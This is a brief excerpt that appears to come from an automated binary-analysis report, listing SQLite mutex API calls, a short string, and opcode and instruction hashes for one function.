                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E261A3
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: La
                                                    • API String ID: 1477753154-3337869896
                                                    • Opcode ID: 2db8a55825a691025075a65482ebd4321c2b9e76b21dcb118d6e57c5f676dc6d
                                                    • Instruction ID: 2e6fe5fe5d67c3e5516109a2096a260fe30d01f85ffdc43b6059f058c8211ff7
                                                    • Opcode Fuzzy Hash: 2db8a55825a691025075a65482ebd4321c2b9e76b21dcb118d6e57c5f676dc6d
                                                    • Instruction Fuzzy Hash: 5311C0B5A007449BDB00DF9AE48065EBBB0FB8B329F14852AD9085B340E335E891CBD1